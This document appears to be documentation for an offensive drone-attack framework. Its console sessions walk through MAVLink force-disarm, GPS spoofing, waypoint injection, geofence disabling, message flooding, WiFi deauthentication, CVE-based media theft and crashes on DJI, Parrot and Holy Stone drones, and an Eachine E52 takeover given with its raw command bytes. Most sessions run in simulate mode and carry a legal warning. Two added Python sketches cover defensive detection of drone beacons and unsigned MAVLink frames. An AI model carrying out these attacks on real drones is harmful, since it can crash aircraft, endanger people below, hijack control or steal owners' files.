Drone Security
Legal Warning: Unauthorized drone interference - deauth, disarm, GPS spoofing, command injection - violates aviation law in all jurisdictions. In many countries it constitutes a federal criminal offense with severe penalties. Use ONLY on drones you own, in RF-shielded environments, or under explicit written authorization from the drone owner and the relevant aviation authority.
| Module | Description |
|---|---|
| `drone_scanner` | Drone discovery by WiFi SSID fingerprint (DJI, Parrot, Holy Stone, FPV) |
| `mavlink/mavlink_scanner` | MAVLink device scanner on UDP 14550 / TCP 5760 |
| `mavlink/mavlink_force_disarm` | Force disarm command via MAV_CMD_COMPONENT_ARM_DISARM |
| `mavlink/mavlink_gps_spoof` | Inject spoofed GPS NMEA to ground station / GCS |
| `mavlink/mavlink_waypoint_inject` | Overwrite active mission waypoints |
| `mavlink/mavlink_geofence_disable` | Disable geofence parameters via PARAM_SET |
| `mavlink/mavlink_param_dump` | Dump all autopilot parameters (read-only audit) |
| `mavlink/mavlink_flood_dos` | MAVLink message flood DoS |
| `dji/dji_wifi_scan` | DJI drone SSID scanner and version extractor |
| `dji/dji_deauth` | DJI WiFi deauthentication (landing interruption) |
| `dji/dji_quicktransfer_exfil_cve_2023_6951` | CVE-2023-6951 - DJI QuickTransfer unauthenticated file exfil |
| `parrot/parrot_anafi_deauth_cve_2019_3944` | CVE-2019-3944 - Parrot ANAFI WiFi deauth |
| `parrot/parrot_anafi_webcrash_cve_2019_3945` | CVE-2019-3945 - Parrot ANAFI REST API crash |
| `parrot/parrot_anafi_udp_cmd_inject` | Parrot ANAFI UDP command injection |
| `parrot/parrot_bebop_dhcp_exhaust_cve_2022_46416` | CVE-2022-46416 - Parrot Bebop DHCP pool exhaustion |
| `holystone/hsrid01_ble_dos_cve_2024_52876` | CVE-2024-52876 - Holy Stone HSRID01 BLE DoS |
| `fpv/eachine_e52_tcp_takeover` | Eachine E52 TCP replay takeover |
Most consumer drones broadcast identifiable SSIDs. The drone_scanner module passively identifies drones by SSID patterns.
```
wxf > use generic/drones/drone_scanner
wxf (DroneScanner) > set INTERFACE wlan0mon
wxf (DroneScanner) > run
[*] Passive drone discovery on wlan0mon...
[*] Scanning all channels...
[+] DJI Mavic Mini 2 | SSID: MAVIC-MINI-2-3A5B | Ch 6 | RSSI: -52 | MAC: AA:BB:CC:11:22:33
    Fingerprint: DJI WiFi AP (OUI: 60:60:1F)
    Open for: dji_wifi_scan, dji_deauth
[+] Parrot ANAFI | SSID: ANAFI-E0F1 | Ch 11 | RSSI: -67 | MAC: 90:03:B7:44:55:66
    Fingerprint: Parrot drone (OUI: 90:03:B7)
    Open for: parrot_anafi_deauth_cve_2019_3944, parrot_anafi_webcrash_cve_2019_3945
[+] Unknown FPV | SSID: WIFI-FPV-CAM | Ch 1 | RSSI: -71 | MAC: DC:71:96:77:88:99
    Fingerprint: FPV camera controller (OUI: DC:71:96)
[*] Scan complete: 3 drones found
```
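
The same SSID and OUI fingerprints can drive a site's own airspace monitoring. The sketch below is an added example, not code from the wxf project: it grades each observed beacon by which fields matched and checks it against an inventory of authorized drones. The patterns and OUIs are the ones shown in the session output above; `AUTHORIZED_BSSIDS`, `classify` and `triage` are hypothetical names, and the beacon list is constructed.

```python
import re

# Fingerprints taken from the scanner output on this page: (vendor, SSID prefix, OUI).
FINGERPRINTS = [
    ("DJI", re.compile(r"^MAVIC-"), "60:60:1F"),
    ("Parrot", re.compile(r"^ANAFI-"), "90:03:B7"),
    ("FPV", re.compile(r"^WIFI-FPV-"), "DC:71:96"),
]

# Assumption: the site keeps an inventory of the BSSIDs of drones it operates.
AUTHORIZED_BSSIDS = {"90:03:B7:44:55:66"}

def classify(ssid, bssid):
    """Return (vendor, evidence, authorized), or None if the AP is not drone-like."""
    bssid = bssid.upper()
    for vendor, ssid_re, vendor_oui in FINGERPRINTS:
        ssid_hit = bool(ssid_re.match(ssid))
        oui_hit = bssid[:8] == vendor_oui
        if not (ssid_hit or oui_hit):
            continue
        # SSID and MAC are both set by the sender; agreement only raises confidence.
        if ssid_hit and oui_hit:
            evidence = "ssid+oui"
        else:
            evidence = "ssid-only" if ssid_hit else "oui-only"
        return vendor, evidence, bssid in AUTHORIZED_BSSIDS
    return None

def triage(beacons):
    """Split beacons into alerts (drone-like, not in inventory) and known drones."""
    alerts, known = [], []
    for ssid, bssid in beacons:
        hit = classify(ssid, bssid)
        if hit is not None:
            (known if hit[2] else alerts).append((ssid, bssid, hit[0], hit[1]))
    return alerts, known

# Constructed sample beacons: values reused from the output above plus one ordinary AP.
SAMPLE = [
    ("MAVIC-MINI-2-3A5B", "60:60:1F:AA:BB:CC"),
    ("MAVIC-MINI-2-3A5B", "AA:BB:CC:11:22:33"),   # SSID matches, OUI does not
    ("ANAFI-E0F1", "90:03:B7:44:55:66"),
    ("WIFI-FPV-CAM", "DC:71:96:77:88:99"),
    ("CorpGuest", "00:11:22:33:44:55"),
]

if __name__ == "__main__":
    alerts, known = triage(SAMPLE)
    for row in alerts:
        print("ALERT", row)
    for row in known:
        print("known", row)
```
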
MAVLink is the open protocol used by ArduPilot, PX4, and many commercial drones. It runs over UDP port 14550 or TCP port 5760 with no authentication by default.
```
wxf > use generic/drones/mavlink/mavlink_scanner
wxf (MAVLinkScanner) > set TARGET_CIDR 192.168.1.0/24
wxf (MAVLinkScanner) > run
[*] Scanning 192.168.1.0/24 for MAVLink endpoints...
[+] 192.168.1.100:14550/UDP | System ID: 1 | Component: Autopilot
    Firmware: ArduCopter 4.3.7
    Modes available: STABILIZE, ALT_HOLD, AUTO, GUIDED, LOITER, RTL, LAND
    Heartbeat rate: 1 Hz
[+] 192.168.1.101:5760/TCP | System ID: 255 | Component: GCS
    Software: Mission Planner 1.3.80
[*] Scan complete: 2 MAVLink endpoints found
```

```
wxf > use generic/drones/mavlink/mavlink_force_disarm
wxf (MAVForceDisarm) > set RHOST 192.168.1.100
wxf (MAVForceDisarm) > set RPORT 14550
wxf (MAVForceDisarm) > set SIMULATE true
wxf (MAVForceDisarm) > run
[SIMULATE] Would send MAV_CMD_COMPONENT_ARM_DISARM
[SIMULATE] param1=0 (disarm) | param2=21196 (force flag)
[SIMULATE] Target: udp://192.168.1.100:14550 sysid=1 compid=1
[SIMULATE] MAVLink v2 message (signed: no)
[!] Set SIMULATE=false to send live command
[!] PREREQ: Network access to drone on UDP 14550
[!] WARNING: Force disarm on an airborne drone causes immediate crash
```

```
wxf > use generic/drones/mavlink/mavlink_gps_spoof
wxf (MAVGPSSpoof) > set RHOST 192.168.1.100
wxf (MAVGPSSpoof) > set LAT -23.5505
wxf (MAVGPSSpoof) > set LON -46.6333
wxf (MAVGPSSpoof) > set ALT 100.0
wxf (MAVGPSSpoof) > set SIMULATE true
wxf (MAVGPSSpoof) > run
[SIMULATE] MAVLink GPS override injection
[SIMULATE] Target: udp://192.168.1.100:14550
[SIMULATE] Spoofed position: -23.550500, -46.633300 alt=100.0m
[SIMULATE] Message: GLOBAL_POSITION_INT / HIL_GPS
[SIMULATE] Would send continuously at 5 Hz until Ctrl+C
[!] GPS spoofing may trigger geofence violation or RTL
[!] Set SIMULATE=false to inject
```

```
wxf > use generic/drones/mavlink/mavlink_waypoint_inject
wxf (MAVWaypointInject) > set RHOST 192.168.1.100
wxf (MAVWaypointInject) > set WAYPOINTS [{"lat": -23.5, "lon": -46.6, "alt": 50}]
wxf (MAVWaypointInject) > set SIMULATE true
wxf (MAVWaypointInject) > run
[SIMULATE] MAVLink mission upload
[SIMULATE] Clearing current mission (MISSION_CLEAR_ALL)
[SIMULATE] Uploading 1 waypoints
[SIMULATE] WP0: LAT=-23.5, LON=-46.6, ALT=50m, action=WAYPOINT
[!] Set SIMULATE=false to upload mission
```

```
wxf > use generic/drones/mavlink/mavlink_geofence_disable
wxf (MAVGeofenceDisable) > set RHOST 192.168.1.100
wxf (MAVGeofenceDisable) > set SIMULATE true
wxf (MAVGeofenceDisable) > run
[SIMULATE] PARAM_SET FENCE_ENABLE = 0 to 192.168.1.100:14550
[SIMULATE] Geofence disabled: drone can fly outside programmed boundaries
[!] Set SIMULATE=false to send live parameter set
```

```
wxf > use generic/drones/mavlink/mavlink_param_dump
wxf (MAVParamDump) > set RHOST 192.168.1.100
wxf (MAVParamDump) > set OUTPUT_FILE /tmp/mavlink_params.json
wxf (MAVParamDump) > run
[*] Requesting all autopilot parameters from 192.168.1.100:14550...
[+] ARMING_CHECK = 1
[+] FENCE_ENABLE = 1
[+] FENCE_TYPE = 7 (circle+polygon+alt)
[+] FENCE_ACTION = 1 (RTL on breach)
[+] GPS_TYPE = 1
[+] LOG_BITMASK = 176126
[+] SYSID_MYGCS = 255
...
[*] 847 parameters retrieved.
[+] Saved to /tmp/mavlink_params.json
```

```
wxf > use generic/drones/mavlink/mavlink_flood_dos
wxf (MAVFloodDoS) > set RHOST 192.168.1.100
wxf (MAVFloodDoS) > set RPORT 14550
wxf (MAVFloodDoS) > set RATE 1000
wxf (MAVFloodDoS) > set SIMULATE true
wxf (MAVFloodDoS) > run
[SIMULATE] MAVLink UDP flood: 1000 msg/s to 192.168.1.100:14550
[SIMULATE] Message types: HEARTBEAT, REQUEST_DATA_STREAM, COMMAND_LONG
[SIMULATE] Expected effect: autopilot CPU overload, telemetry blackout
[!] Set SIMULATE=false to run
```
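
The MAVLink sessions above all depend on the link accepting unsigned frames (`signed: no`). The following added example, which is not part of wxf, shows how a monitor on the telemetry network could parse captured MAVLink v2 frames and flag the state-changing messages named above (force disarm, `FENCE_ENABLE = 0`, `MISSION_CLEAR_ALL`) when they are unsigned or come from an unexpected system ID. Assumptions: the trusted GCS uses system ID 255 as in the parameter dump, the function names are hypothetical, and only the presence of a signature is checked, since verifying it needs the link key; the CRC is not validated.

```python
import struct

SIGNED = 0x01            # MAVLINK_IFLAG_SIGNED bit in incompat_flags
PARAM_SET, MISSION_CLEAR_ALL, COMMAND_LONG = 23, 45, 76   # MAVLink message ids
ARM_DISARM, FORCE = 400, 21196   # MAV_CMD_COMPONENT_ARM_DISARM; param2 value from this page
TRUSTED_GCS = {255}      # assumption: the site's GCS uses SYSID_MYGCS = 255

def parse_v2(frame):
    """Split one MAVLink v2 frame into fields. The CRC is not verified."""
    if len(frame) < 12 or frame[0] != 0xFD:
        return None
    signed = bool(frame[2] & SIGNED)
    if len(frame) != 12 + frame[1] + (13 if signed else 0):
        return None
    return {"sysid": frame[5], "signed": signed, "payload": frame[10:10 + frame[1]],
            "msgid": int.from_bytes(frame[7:10], "little")}

def action_of(msg):
    """Name the state-changing action a message carries, or None."""
    p = msg["payload"]
    if msg["msgid"] == COMMAND_LONG:
        p = p.ljust(33, b"\0")               # v2 strips trailing zero bytes
        param1, param2, command = struct.unpack_from("<2f20xH", p)
        if command == ARM_DISARM and param1 == 0:
            return "force-disarm" if param2 == FORCE else "disarm"
    elif msg["msgid"] == PARAM_SET:
        p = p.ljust(23, b"\0")               # float value, 2 target bytes, 16-byte name
        if p[6:22].rstrip(b"\0") == b"FENCE_ENABLE" and struct.unpack_from("<f", p)[0] == 0:
            return "geofence-disable"
    elif msg["msgid"] == MISSION_CLEAR_ALL:
        return "mission-clear"
    return None

def inspect(frame):
    """Alert text when a risky frame is unsigned or from an unknown sysid."""
    msg = parse_v2(frame)
    action = action_of(msg) if msg else None
    why = []
    if action and not msg["signed"]:
        why.append("unsigned")
    if action and msg["sysid"] not in TRUSTED_GCS:
        why.append("sysid %d not a known GCS" % msg["sysid"])
    return "%s: %s" % (action, ", ".join(why)) if why else None

def sample(sysid, msgid, payload, signed=False):
    """Constructed test frame: zeroed CRC and signature, not valid on a real link."""
    head = bytes([0xFD, len(payload), SIGNED if signed else 0, 0, 0, sysid, 1])
    return head + msgid.to_bytes(3, "little") + payload + b"\0" * (15 if signed else 2)

# Constructed payloads for the detector's self-check.
DISARM = struct.pack("<7fHBBB", 0, FORCE, 0, 0, 0, 0, 0, ARM_DISARM, 1, 1, 0).rstrip(b"\0")
FENCE_OFF = struct.pack("<fBB16sB", 0.0, 1, 1, b"FENCE_ENABLE", 9)
```

Enabling MAVLink 2 message signing on the autopilot and GCS is what turns the `unsigned` reason from a routine observation into a reliable alert.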
```
wxf > use generic/drones/dji/dji_wifi_scan
wxf (DJIWifiScan) > set INTERFACE wlan0mon
wxf (DJIWifiScan) > run
[*] Scanning for DJI drone SSIDs...
[+] Found: MAVIC-MINI-2-3A5B | MAC: 60:60:1F:AA:BB:CC | Ch 6 | RSSI: -52
    DJI OUI: 60:60:1F (confirmed)
    SSID pattern: MAVIC-MINI-2 -> model: Mavic Mini 2
    Firmware estimate: v01.00.0300+ (from beacon IE)
    AP password: not set (open network)
[*] Scan complete. 1 DJI drone found.
```

```
wxf > use generic/drones/dji/dji_deauth
wxf (DJIDeauth) > set INTERFACE wlan0mon
wxf (DJIDeauth) > set TARGET_BSSID 60:60:1F:AA:BB:CC
wxf (DJIDeauth) > set COUNT 10
wxf (DJIDeauth) > set SIMULATE true
wxf (DJIDeauth) > run
[SIMULATE] Sending 10 deauth frames to 60:60:1F:AA:BB:CC
[SIMULATE] Source: spoofed BSSID | Reason: 0x07 (class 3 frame from nonassoc STA)
[SIMULATE] Effect: RC/app disconnects from drone WiFi -> failsafe RTL or hover
[!] Set SIMULATE=false to transmit
[!] PREREQ: Monitor mode interface (wlan0mon)
```

```
wxf > use generic/drones/dji/dji_quicktransfer_exfil_cve_2023_6951
wxf (DJIQuickTransferExfil) > show info
  Name: DJI QuickTransfer Unauthenticated File Exfil
  CVE: CVE-2023-6951
  CVSS: 7.5 (High)
  Target: DJI Mini 3 Pro, DJI Air 3, DJI RC-N1, DJI RC 2
  Auth: None required (open WiFi AP)
  Status: Patched in DJI firmware update 01.01.0200+
  Description:
    DJI QuickTransfer mode exposes an HTTP file server with no authentication.
    An attacker associated to the drone WiFi AP can enumerate and download
    all media files from /DCIM/ without pairing or authentication.
wxf (DJIQuickTransferExfil) > set RHOST 192.168.2.1
wxf (DJIQuickTransferExfil) > set OUTPUT_DIR /tmp/dji_exfil
wxf (DJIQuickTransferExfil) > set SIMULATE true
wxf (DJIQuickTransferExfil) > run
[SIMULATE] CVE-2023-6951: DJI QuickTransfer unauthenticated file access
[SIMULATE] Target: http://192.168.2.1:80
[SIMULATE] Enumerating /DCIM/...
[SIMULATE] Found: DJI_0001.MP4 (4.2 GB)
[SIMULATE] Found: DJI_0002.JPG (18 MB)
[SIMULATE] Found: DJI_0003.JPG (17 MB)
[SIMULATE] Total: 3 files, ~4.2 GB
[SIMULATE] Would download to /tmp/dji_exfil/
[!] Set SIMULATE=false - requires WiFi association to DJI drone
[!] NOTE: Drone must be in QuickTransfer mode (enabled via DJI RC screen)
```
```
wxf > use generic/drones/parrot/parrot_anafi_deauth_cve_2019_3944
wxf (ParrotANAFIDeauth) > show info
  Name: Parrot ANAFI WiFi Deauthentication
  CVE: CVE-2019-3944
  CVSS: 6.5 (Medium)
  Target: Parrot ANAFI (firmware <= 1.6.5)
  Auth: None required (attacker must be in WiFi range)
  Description:
    The ANAFI drone WiFi network rejects deauth frames but a crafted
    management frame sequence causes the onboard Linux AP to crash,
    disconnecting the RC and triggering autonomous landing.
wxf (ParrotANAFIDeauth) > set INTERFACE wlan0mon
wxf (ParrotANAFIDeauth) > set TARGET_BSSID 90:03:B7:44:55:66
wxf (ParrotANAFIDeauth) > set SIMULATE true
wxf (ParrotANAFIDeauth) > run
[SIMULATE] CVE-2019-3944: Parrot ANAFI deauth sequence
[SIMULATE] Sending crafted management frames to 90:03:B7:44:55:66
[SIMULATE] Expected: AP WiFi daemon crashes, drone enters autonomous landing
[!] Set SIMULATE=false to transmit
```

```
wxf > use generic/drones/parrot/parrot_anafi_webcrash_cve_2019_3945
wxf (ParrotANAFIWebCrash) > set RHOST 192.168.42.1
wxf (ParrotANAFIWebCrash) > set SIMULATE true
wxf (ParrotANAFIWebCrash) > run
[SIMULATE] CVE-2019-3945: Parrot ANAFI REST API crash
[SIMULATE] Target: http://192.168.42.1/api/v1/
[SIMULATE] Sending malformed HTTP request to crash httpd on drone
[SIMULATE] Effect: drone REST API becomes unavailable, controller loses telemetry
[!] Set SIMULATE=false - requires WiFi association to Parrot ANAFI network
```

```
wxf > use generic/drones/parrot/parrot_bebop_dhcp_exhaust_cve_2022_46416
wxf (ParrotBebopDHCP) > show info
  CVE: CVE-2022-46416
  CVSS: 7.5 (High)
  Target: Parrot Bebop 2 (all firmware)
  Effect: DHCP pool exhaustion - legitimate RC cannot obtain IP, loses control
wxf (ParrotBebopDHCP) > set INTERFACE wlan0
wxf (ParrotBebopDHCP) > set SIMULATE true
wxf (ParrotBebopDHCP) > run
[SIMULATE] CVE-2022-46416: Parrot Bebop DHCP exhaustion
[SIMULATE] Sending DHCPDISCOVER with randomized MAC addresses
[SIMULATE] Bebop DHCP pool: /28 (14 hosts) - exhaust in ~14 requests
[SIMULATE] Effect: legitimate RC cannot join network, drone loses control link
[!] Set SIMULATE=false - requires WiFi association to Parrot Bebop network
```
```
wxf > use generic/drones/holystone/hsrid01_ble_dos_cve_2024_52876
wxf (HSRIDDoS) > show info
  Name: Holy Stone HSRID01 BLE DoS
  CVE: CVE-2024-52876
  CVSS: 6.5 (Medium)
  Target: Holy Stone HSRID01 drone ID module
  Auth: None required (BLE range)
  Description:
    The HSRID01 Remote ID module broadcasts drone position via BLE.
    A malformed BLE GATT write to the firmware update characteristic
    causes the module to crash and stop broadcasting, violating
    FAA/EASA Remote ID requirements.
wxf (HSRIDDoS) > set TARGET_MAC AA:BB:CC:DD:EE:FF
wxf (HSRIDDoS) > set SIMULATE true
wxf (HSRIDDoS) > run
[SIMULATE] CVE-2024-52876: HSRID01 BLE DoS
[SIMULATE] Target: AA:BB:CC:DD:EE:FF (Holy Stone HSRID01)
[SIMULATE] Connecting via BLE GATT...
[SIMULATE] Writing malformed payload to firmware characteristic 0xFF01
[SIMULATE] Expected: module crashes, Remote ID broadcast stops
[!] Set SIMULATE=false - requires BLE adapter (BlueZ)
```
```
wxf > use generic/drones/fpv/eachine_e52_tcp_takeover
wxf (EachineE52) > show info
  Name: Eachine E52 TCP Replay Takeover
  Target: Eachine E52 (and clones with same firmware)
  Auth: None required (drone WiFi open)
  Description:
    The Eachine E52 uses an unencrypted, unauthenticated TCP control protocol
    on port 8080. By replaying captured command sequences, an attacker can
    take full control of the drone including takeoff, landing, and direction.
wxf (EachineE52) > set RHOST 192.168.1.1
wxf (EachineE52) > set COMMAND land
wxf (EachineE52) > set SIMULATE true
wxf (EachineE52) > run
[SIMULATE] Eachine E52 TCP command injection
[SIMULATE] Target: tcp://192.168.1.1:8080
[SIMULATE] Command: LAND (byte sequence: 66 05 04 00 00 00 00 00 68)
[SIMULATE] No authentication required - any device on the drone WiFi can send commands
[!] Set SIMULATE=false - requires WiFi association to E52 AP (SSID: WIFI-FPV-XXXX)
```
Related pages: Sub-GHz Attacks | Maritime Security | Wi-Fi Attacks
Author: Andre Henrique (@mrhenrike) | Uniao Geek